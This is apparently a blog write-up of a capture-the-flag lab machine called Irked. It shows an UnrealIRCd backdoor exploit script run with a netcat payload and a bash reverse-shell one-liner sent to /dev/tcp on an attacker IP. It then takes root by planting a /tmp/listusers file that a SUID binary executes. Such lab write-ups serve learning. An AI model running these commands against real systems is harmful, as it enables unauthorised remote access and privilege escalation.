Irked is based on ircd. It was fun while it lasted. but took me a lot of time to solve it. We will start with nmap as always
first checked port 80
IRC is almost working. That’s the first clue right there. We will try another method to confirm this
Time to Attack IRC. After searching and going through some exploits found something that really worked.
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor the perfect exploit. He actually rewrote the whole thing with python. And he has done a great job. downloaded the script and edited it
you have to provide your ip address. I made a mistake while editing that gave me a lot of trouble. My actual IP was 10.10.14.4. But I wrote there 3 and it didn’t work properly. After a while checked it again and changed it. I make mistakes and yes I make lot of mistakes.
we need make sure netcat is listening to port 4444. python3 exploit.py -payload netcat 10.10.10.117 6697
And this happens. I do not have permission to view the file. Now I’m mad. After countless hours of waiting this is what happens.I needed a better shell forwarded the shell. bash -i >& /dev/tcp/10.10.14.4/4443 0>&1
Now we have a better shell. Atleast that’s what I think.
Ok I missed one screenshot which actually show that there was a .backup file which said something about steg.
I guess that means there was something hidden in that stupid looking picture in the website. But right now Im not bothered about it since I have a shell. Maybe this is the long way and that might have been a shortcut. Your more than welcome to try it but I wont try it.
Was poking around hoping that I might find some and I did. How lucky can I be?
And we all know /usr/bin/viewuser
is not something normal. Let’s continue to explore the wonders of viewuser.
First thing file in the tmp folder is missing. Good for us. I missed another screenshot which shows that the file executes with root privileges. Better luck next time. So we create a file called listusers and we use one liner shell script to call for a root shell. Its purely evil.
echo '/bin/
bash’ > /tmp/listusers
now we give executing rights to everyone
Time to call the scipt
And there you have it. It’s all done.
Be First to Comment